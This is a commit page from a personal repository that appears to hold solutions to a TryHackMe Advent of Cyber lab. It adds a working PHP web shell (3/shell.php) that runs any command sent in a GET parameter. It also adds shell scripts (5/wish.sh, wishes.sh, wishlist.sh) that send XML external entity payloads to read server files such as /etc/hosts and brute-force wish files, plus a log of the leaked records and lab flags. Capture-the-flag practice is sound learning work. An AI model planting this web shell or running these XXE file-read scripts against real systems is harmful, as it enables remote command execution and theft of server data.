siv/aoc24
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

batman

Browse Source
This commit is contained in:
Sivert V. Sæther 2024-12-08 17:19:06 +01:00
commit 8ffc4db7a8
9 changed files with 269 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
1/somg.mp3 Normal file
View File

Binary file not shown.

BIN
1/song.mp3 Executable file
View File

Binary file not shown.

22
3/shell.php Normal file
View File

@ -0,0 +1,22 @@
<html>
<style>
body {
color: lime;
background-color: #333;
}
</style>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['command']))
{
system($_GET['command'] . ' 2>&1');
}
?>
</pre>
</body>
</html>

23
5/CHANGELOG Normal file
View File

@ -0,0 +1,23 @@
commit 3f786850e387550fdab836ed7e6dc881de23001b (HEAD -> master, origin/master, origin/HEAD)
Author: Mayor Malware - Wareville <mayor@wareville.org>
Date: Wed Dec 4 21:24:22 2024 +0200
Fixed the wishlist.php page THM{m4y0r_m4lw4r3_b4ckd00rs}
commit 89e6c98d92887913cadf06b2adb97f26cde4849b (tag: v1.0.0)
Author: Software - Wareville <software@wareville.org>
Date: Thu Dec 4 14:45:18 2024 +0200
Almost done with the wishlists page, needs to handle XML parsing
commit 2b66fd261ee5c6cfc8de7fa466bab600bcfe4f69
Author: Software - Wareville <software@wareville.org>
Date: Tue Dec 2 15:20:57 2024 +0200
Finally done with the landing page and initial CSS
commit e983f374794de9c64e3d1c1de1d490c0756eeeff
Author: Software - Wareville <software@wareville.org>
Date: Tue Dec 2 15:19:33 2024 +0200
Initial commit

1
5/trgt Normal file
View File

@ -0,0 +1 @@
10.10.148.114

12
5/wish.sh Executable file
View File

@ -0,0 +1,12 @@
#!/bin/sh
target=`cat trgt`
curl -iH 'Content-Type: application/xml' "http://$target/wishlist.php" \
-d "<!--?xml version='1.0' ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM '/var/www/html/wishes/wish_1.txt'> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>&payload;</product_id>
</item>
</wishlist>"

176
5/wishes.log Normal file
View File

@ -0,0 +1,176 @@
Trying wish_1.txt...
The product ID: Wish #1
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_2.txt...
The product ID: Wish #2
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_3.txt...
The product ID: Wish #3
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_4.txt...
The product ID: Wish #4
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_5.txt...
The product ID: Wish #5
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_6.txt...
The product ID: Wish #6
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_7.txt...
The product ID: Wish #7
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_8.txt...
The product ID: Wish #8
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_9.txt...
The product ID: Wish #9
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_10.txt...
The product ID: Wish #10
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_11.txt...
The product ID: Wish #11
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_12.txt...
The product ID: Wish #12
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_13.txt...
The product ID: Wish #13
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_14.txt...
The product ID: Wish #14
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_15.txt...
The product ID: Wish #15
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
PS: The flag is THM{Brut3f0rc1n6_mY_w4y}
is invalid.
Trying wish_16.txt...
The product ID: Wish #16
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_17.txt...
The product ID: Wish #17
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_18.txt...
The product ID: Wish #18
Name: Test
Address: Test
---------------------------------------
Product: Wareville's Jolly Cap
Quantity: 1
---------------------------------------
is invalid.
Trying wish_19.txt...
The product ID: Wish #19
Name: Test
Address: TEst
---------------------------------------
Product: Teddy of the Ville
Quantity: 1
---------------------------------------
is invalid.
Trying wish_20.txt...
The product ID: is invalid.
Trying wish_21.txt...
Failed to parse XML

23
5/wishes.sh Executable file
View File

@ -0,0 +1,23 @@
#!/bin/bash
target=`cat trgt`
opts="-sH 'Content-Type: application/xml'"
declare -i i=1
#i=20
while [ $i -gt 0 ]; do
echo "Trying wish_$i.txt..."
p="<!--?xml version='1.0' ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM '/var/www/html/wishes/wish_$i.txt'> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>&payload;</product_id>
</item>
</wishlist>"
out=`curl $opts http://$target/wishlist.php -d "$p"`
echo "$out"
echo "$out" | grep -q 'Failed to parse XML'
[ $? -eq 0 ] && break;
sleep 1
i+=1
done

12
5/wishlist.sh Executable file
View File

@ -0,0 +1,12 @@
#!/bin/sh
target=`cat trgt`
curl -iH 'Content-Type: application/xml' "http://$target/wishlist.php" \
-d '<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>&payload;</product_id>
</item>
</wishlist>'